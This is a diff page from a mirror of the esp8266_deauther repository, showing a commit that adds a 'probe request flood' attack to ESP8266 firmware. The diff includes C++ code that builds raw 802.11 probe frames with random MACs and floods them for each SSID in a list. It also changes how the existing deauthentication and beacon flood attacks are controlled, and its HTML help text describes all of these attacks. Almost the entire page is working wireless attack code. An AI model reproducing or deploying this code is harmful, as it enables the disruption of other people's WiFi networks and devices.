gitea-mirror/esp8266_deauther
1
0
Fork 0
mirror of https://github.com/SpacehuhnTech/esp8266_deauther.git synced 2025-12-23 07:29:20 -08:00
Code Issues Packages Projects Releases Wiki Activity

Added Probe Request Attack

Browse Source
This commit is contained in:
Stefan Kremser
2017-03-10 20:24:32 +01:00
parent 42058cf872
commit 141c9f17a3
5 changed files with 94 additions and 26 deletions
Download Patch File Download Diff File Expand all files Collapse all files

78
esp8266_deauther/Attack.cpp
View File

@@ -5,7 +5,7 @@ Attack::Attack(){
} }
void Attack::generate(){ void Attack::generate(){
if(debug) Serial.print("generating Macs..."); if(debug) Serial.print("\n generating Macs...");
Mac _randomBeaconMac; Mac _randomBeaconMac;
uint8_t _randomMacBuffer[6]; uint8_t _randomMacBuffer[6];
@@ -80,6 +80,24 @@ void Attack::buildBeacon(Mac _ap, String _ssid, int _ch, bool encrypt){
} }
void Attack::buildProbe(String _ssid, Mac _mac){
int len = _ssid.length();
if(len > 32) len = 32;
packetSize = 0;
for(int i=0;i<sizeof(probePacket);i++) packet[packetSize+i] = probePacket[i];
packetSize += sizeof(probePacket);
for(int i=0;i<6;i++) packet[10+i] = _mac._get(i);
packet[packetSize] = len;
packetSize++;
for(int i=0;i<len;i++) packet[packetSize+i] = _ssid[i];
packetSize += len;
}
bool Attack::send(){ bool Attack::send(){
if(wifi_send_pkt_freedom(packet, packetSize, 0) == -1){ if(wifi_send_pkt_freedom(packet, packetSize, 0) == -1){
/* /*
@@ -101,7 +119,7 @@ void Attack::run(){
/* =============== Deauth Attack =============== */ /* =============== Deauth Attack =============== */
if(isRunning[0] && currentMillis-prevTime[0] >= 1000){ if(isRunning[0] && currentMillis-prevTime[0] >= 1000){
if(debug) Serial.print("running "+(String)attackNames[0]+" attack"); if(debug) Serial.print("running "+(String)attackNames[0]+" attack...");
prevTime[0] = millis(); prevTime[0] = millis();
for(int a=0;a<apScan.results;a++){ for(int a=0;a<apScan.results;a++){
@@ -150,7 +168,7 @@ void Attack::run(){
/* =============== Beacon clone Attack =============== */ /* =============== Beacon clone Attack =============== */
if(isRunning[1] && currentMillis-prevTime[1] >= 100){ if(isRunning[1] && currentMillis-prevTime[1] >= 100){
if(debug) Serial.print("running "+(String)attackNames[1]+" attack"); if(debug) Serial.print("running "+(String)attackNames[1]+" attack...");
prevTime[1] = millis(); prevTime[1] = millis();
for(int a=0;a<apScan.results;a++){ for(int a=0;a<apScan.results;a++){
@@ -193,7 +211,7 @@ void Attack::run(){
generate(); generate();
macListChangeCounter = 0; macListChangeCounter = 0;
} }
if(debug) Serial.println(" done "); if(debug) Serial.println(" done");
if(settings.attackTimeout > 0){ if(settings.attackTimeout > 0){
attackTimeoutCounter[1]++; attackTimeoutCounter[1]++;
if(attackTimeoutCounter[1]/10 > settings.attackTimeout) stop(1); if(attackTimeoutCounter[1]/10 > settings.attackTimeout) stop(1);
@@ -202,7 +220,7 @@ void Attack::run(){
/* =============== Beacon list Attack =============== */ /* =============== Beacon list Attack =============== */
if(isRunning[2] && currentMillis-prevTime[2] >= 100){ if(isRunning[2] && currentMillis-prevTime[2] >= 100){
if(debug) Serial.print("running "+(String)attackNames[2]+" attack"); if(debug) Serial.print("running "+(String)attackNames[2]+" attack...");
prevTime[2] = millis(); prevTime[2] = millis();
for(int a=0;a<ssidList.len;a++){ for(int a=0;a<ssidList.len;a++){
@@ -216,17 +234,41 @@ void Attack::run(){
stati[2] = (String)(packetsCounter[2]*10)+"pkts/s"; stati[2] = (String)(packetsCounter[2]*10)+"pkts/s";
packetsCounter[2] = 0; packetsCounter[2] = 0;
/*macListChangeCounter++; macListChangeCounter++;
if(macListChangeCounter/10 >= macChangeInterval && macChangeInterval > 0){ if(macListChangeCounter/10 >= macChangeInterval && macChangeInterval > 0){
generate(); generate();
macListChangeCounter = 0; macListChangeCounter = 0;
}*/ }
if(debug) Serial.println("done"); if(debug) Serial.println(" done");
if(settings.attackTimeout > 0){ if(settings.attackTimeout > 0){
attackTimeoutCounter[2]++; attackTimeoutCounter[2]++;
if(attackTimeoutCounter[2]/10 > settings.attackTimeout) stop(2); if(attackTimeoutCounter[2]/10 > settings.attackTimeout) stop(2);
} }
} }
/* =============== Probe Request Attack =============== */
if(isRunning[3] && currentMillis-prevTime[3] >= 1000){
if(debug) Serial.print("running "+(String)attackNames[3]+" attack...");
prevTime[3] = millis();
for(int a=0;a<ssidList.len;a++){
buildProbe(ssidList.get(a), beaconAdrs._get(a));
if(send()) packetsCounter[3]++;
}
stati[3] = (String)(packetsCounter[3]*10)+"pkts/s";
packetsCounter[3] = 0;
macListChangeCounter++;
if(macListChangeCounter >= macChangeInterval && macChangeInterval > 0){
generate();
macListChangeCounter = 0;
}
if(debug) Serial.println("done");
if(settings.attackTimeout > 0){
attackTimeoutCounter[3]++;
if(attackTimeoutCounter[3] > settings.attackTimeout) stop(3);
}
}
} }
@@ -239,15 +281,23 @@ void Attack::start(int num){
prevTime[num] = millis(); prevTime[num] = millis();
attackTimeoutCounter[num] = 0; attackTimeoutCounter[num] = 0;
refreshLed(); refreshLed();
if(debug) Serial.println("starting "+(String)attackNames[num]+" attack"); if(debug) Serial.println("starting "+(String)attackNames[num]+" attack...");
if(num == 1 && isRunning[2]) stop(2); if(num == 1){
else if(num == 2 && isRunning[1]) stop(1); stop(2);
stop(3);
} else if(num == 2){
stop(1);
stop(3);
} else if(num == 3){
stop(1);
stop(2);
}
}else stop(num); }else stop(num);
} }
void Attack::stop(int num){ void Attack::stop(int num){
if(isRunning[num]){ if(isRunning[num]){
if(debug) Serial.println("stopping "+(String)attackNames[num]+" attack"); if(debug) Serial.println("stopping "+(String)attackNames[num]+" attack...");
isRunning[num] = false; isRunning[num] = false;
stati[num] = "ready"; stati[num] = "ready";
prevTime[num] = millis(); prevTime[num] = millis();
@@ -265,7 +315,7 @@ String Attack::getResults(){
for(int i=0;i<attacksNum;i++) if(!isRunning[i]) stati[i] = "ready"; for(int i=0;i<attacksNum;i++) if(!isRunning[i]) stati[i] = "ready";
if(apScan.getFirstTarget() < 0) stati[0] = stati[1] = "no AP"; if(apScan.getFirstTarget() < 0) stati[0] = stati[1] = "no AP";
if(ssidList.len < 1) stati[2] = "no SSID"; if(ssidList.len < 1) stati[2] = stati[3] = "no SSID";
int _selected; int _selected;
String json = "{ \"aps\": ["; String json = "{ \"aps\": [";
@@ -311,7 +361,7 @@ String Attack::getResults(){
json += "}"; json += "}";
if(debug){ if(debug){
Serial.println(json); Serial.println(json);
Serial.println("done "); Serial.println("done");
} }
return json; return json;
} }

18
esp8266_deauther/Attack.h
View File

@@ -14,7 +14,7 @@ extern "C" {
#include "Settings.h" #include "Settings.h"
#include "SSIDList.h" #include "SSIDList.h"
#define attacksNum 3 #define attacksNum 4
#define macListLen 64 #define macListLen 64
#define macChangeInterval 4 #define macChangeInterval 4
@@ -43,10 +43,11 @@ class Attack
void buildDeauth(Mac _ap, Mac _client, uint8_t type, uint8_t reason); void buildDeauth(Mac _ap, Mac _client, uint8_t type, uint8_t reason);
void buildBeacon(Mac _ap, String _ssid, int _ch, bool encrypt); void buildBeacon(Mac _ap, String _ssid, int _ch, bool encrypt);
void buildProbe(String _ssid, Mac _mac);
bool send(); bool send();
//attack declarations //attack declarations
const String attackNames[attacksNum] = {"deauth","beacon (clone)","beacon (list)"}; const String attackNames[attacksNum] = {"deauth", "beacon (clone)", "beacon (list)", "probe request"};
//attack infos //attack infos
String stati[attacksNum]; String stati[attacksNum];
@@ -107,6 +108,19 @@ class Attack
0x00, 0x00 //RSN capabilities 0x00, 0x00 //RSN capabilities
}; };
uint8_t probePacket[25] = {
/* 0 - 1 */ 0x40, 0x00, //Type: Probe Request
/* 2 - 3 */ 0x00, 0x00, //Duration: 0 microseconds
/* 4 - 9 */ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, //Destination: Broadcast
/* 10 - 15 */ 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, //Source: random MAC
/* 16 - 21 */ 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, //BSS Id: Broadcast
/* 22 - 23 */ 0x00, 0x00, //Sequence number (will be replaced by the SDK)
/* 24 */ 0x00 //Tag Number: SSID parameter set (0)
/* ,0x06, //Tag length
0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA //SSID
*/
};
int macListChangeCounter = 0; int macListChangeCounter = 0;
int attackTimeoutCounter[attacksNum]; int attackTimeoutCounter[attacksNum];
int channels[macListLen]; int channels[macListLen];

2
esp8266_deauther/data.h
View File

File diff suppressed because one or more lines are too long

4
esp8266_deauther/esp8266_deauther.ino
View File

@@ -213,7 +213,7 @@ void sendAttackInfo() {
void startAttack() { void startAttack() {
if (server.hasArg("num")) { if (server.hasArg("num")) {
int _attackNum = server.arg("num").toInt(); int _attackNum = server.arg("num").toInt();
if (apScan.getFirstTarget() > -1 || _attackNum == 2) { if (apScan.getFirstTarget() > -1 || _attackNum == 2 || _attackNum == 3) {
attack.start(server.arg("num").toInt()); attack.start(server.arg("num").toInt());
server.send ( 200, "text/json", "true"); server.send ( 200, "text/json", "true");
} else server.send( 200, "text/json", "false"); } else server.send( 200, "text/json", "false");
@@ -323,4 +323,4 @@ void editClientName() {
server.send( 200, "text/json", "true"); server.send( 200, "text/json", "true");
} }
} }

18
htmlfiles/attack.html
View File

@@ -43,16 +43,20 @@
</table> </table>
<p class="small"> <p class="small">
<br> <br />
<b>deauth [deauthentication attack]:</b><br> <b>deauth [deauthentication attack]:</b><br />
Sends deauthentication frames and dissociation frames to the selected client(s) in the selected WiFi access point(s). Sends deauthentication frames and dissociation frames to the selected client(s) in the selected WiFi access point(s).
<br> <br />
<b>Note: </b> <b>Note: </b>
If no client is selected, the packets are sent as broadcast! If no client is selected, the packets are sent as broadcast!
<br><br> <br /><br />
<b>beacon [beacon flood attack]:</b><br> <b>beacon [beacon flood attack]:</b><br />
(clone:) spams beacon frames with a similar SSID as the selected WiFi access point(s).<br /> (clone:) Spams beacon frames with a similar SSID as the selected WiFi access point(s).<br />
(list:) spams beacon frames with all SSIDs in the list below. (list:) Spams beacon frames with all SSIDs in the list below.
<br /><br />
<b>probe request [probe request flood attack]:</b><br />
Spams probe request frames with all SSIDs in the list below.<br />
Usefull to confuse and spam WiFi trackers.
</p> </p>
<br /> <br />
<p class="block bold">SSIDs: <span id="ssidCounter">0/64</span> <button class="marginNull warnBtn" onclick="clearSSID()">clear</button> <button class="marginNull" onclick="randomSSID()">random</button> <button class="marginNull" onclick="cloneSSID()">clone</button> <button class="marginNull" onclick="addSSID()">add</button></p> <p class="block bold">SSIDs: <span id="ssidCounter">0/64</span> <button class="marginNull warnBtn" onclick="clearSSID()">clear</button> <button class="marginNull" onclick="randomSSID()">random</button> <button class="marginNull" onclick="cloneSSID()">clone</button> <button class="marginNull" onclick="addSSID()">add</button></p>